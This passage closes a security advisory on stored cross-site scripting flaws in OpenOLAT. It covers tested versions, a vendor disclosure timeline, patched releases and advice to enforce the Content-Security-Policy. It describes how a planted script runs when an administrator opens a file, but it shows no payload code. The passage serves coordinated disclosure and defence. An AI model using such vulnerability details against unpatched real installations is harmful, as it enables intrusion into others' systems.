administrator can access the file and open it, which will open the file in a  
new tab within the browser. This leads to the execution of the shown script and  
will display a message window stating the current domain and path.

Vulnerable / tested versions:  
-----------------------------  
The following versions has been tested which was the latest version available  
at the time of the test:  
* OpenOLAT 18.1.4 Vulnerability 1 and 2  
* OpenOLAT 18.1.5 Vulnerability 3

OpenOLAT version 18.2 was verified whether the identified issues were properly  
fixed.

Vendor contact timeline:  
------------------------  
2024-01-10: Contacting vendor through contact@frentix.com  
2024-01-10: Very quick vendor response within an hour, sending security  
             advisory to provided contact.  
2024-01-10: Feedback from vendor that we submitted known/already fixed issues  
             for version 18.1.  
             Retesting latest version 18.1.4, but only three of our submitted  
             issues had been fixed before (removed from advisory), found  
             additional, new XSS issues again in latest version.  
2024-01-11: Sending updated security advisory to the vendor.  
2024-01-11: Quick feedback from vendor declaring example 1 to 3 as accepted  
             risk, as authors have a trusted position and XSS is only seen as  
             a risk if the attacker is unauthenticated or has low privileges.  
             Example 4 will be patched with the upcoming release. No comment  
             from the vendor on vulnerability 2 regarding the unsafe default  
             configuration.  
2024-01-11: Sending examples 1 to 3 and explaining the risk potential from an  
             attacker's perspective to the vendor. Co-ordination with the vendor  
             regarding the release date of the new version, which includes a fix  
             for example 4. Asking again about the standard configuration  
             mentioned in vulnerability 2 and the vendor's position or judgement  
             on this.  
2024-01-11: Quick reply from the vendor confirming the release date of the new  
             version on 2024-01-17. With regard to examples 1 to 3, the vendor  
             confirmed that no fix is planned. Reference is made to modules in  
             development which will replace the modules containing  
             vulnerabilities in the course of upcoming releases. With regard  
             to privilege escalation, which is enabled by the CSP in chapter 2,  
             the vendor points out that the "unsafe-eval" or "unsafe-inline"  
             option cannot simply be deactivated in the architecture currently  
             in use. With regard to the "report-only" setting of the CSP, the  
             vendor refers to the lack of possibilities to enforce this on  
             the part of the vendor. However, the vendor advises customers to  
             activate it.  
2024-01-17: Release of version 18.1.5 by the vendor. A fix of example 1, 2 and 4  
             was verified by the researchers within this version. Example 3 as  
             well as the CSP from chapter 2 are still exploitable. The PoC code  
             snipped has been redacted in example 3.  
2024-01-18: Mail from vendor, informing us about the release of the patched  
             version. Vendor states, that the development of OpenOLAT will use  
             all points from this advisory as guidance for further improvements.  
2024-01-19: Sending mail to vendor confirming that the examples 1, 2 and 4  
             are fixed. Submitted updated draft of this advisory.  
2024-01-21: Informing vendor about new found XSS within the Media Center, which  
             has been added to this advisory as vulnerability 3 (SVG).  
2024-01-21: Fast response from vendor informing us, that the found XSS will be  
             fixed with an update at the end of January.  
2024-01-23: Sending mail to the vendor thanking for the quick reply.  
2024-01-31: Release of version 18.1.6 by the vendor.  
2024-02-09: The researchers can confirm, that all vulnerabilities mentioned  
             within chapters 1 and 3 are fixed and can no longer be exploited.  
             Vulnerability 2 still works as documented. Informing the vendor,  
             that we can confirm the fix and thanking again for the quick and  
             solution-oriented communication.  
2024-02-09: Vendor: Systematic search for further XSS issues, version 18.2.1  
             contains even more fixes. Version 19 will have CSP enabled by  
             default.  
2024-02-13: Assigning CVE numbers.  
2024-02-20: Coordinated release of security advisory.

Solution:  
---------  
The vendor provided a patched version 18.1.6 / 18.2 or higher which can be downloaded  
from:  
https://www.openolat.com/releases/

Additionally, it is advised to set the Content-Security-Policy active, instead  
of "Report-Only" as well as configuring it as strictly as possible. The upcoming  
version 19 will enable CSP by default.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Johannes Völpel & Mike Klostermaier / @2024

Tag

#auth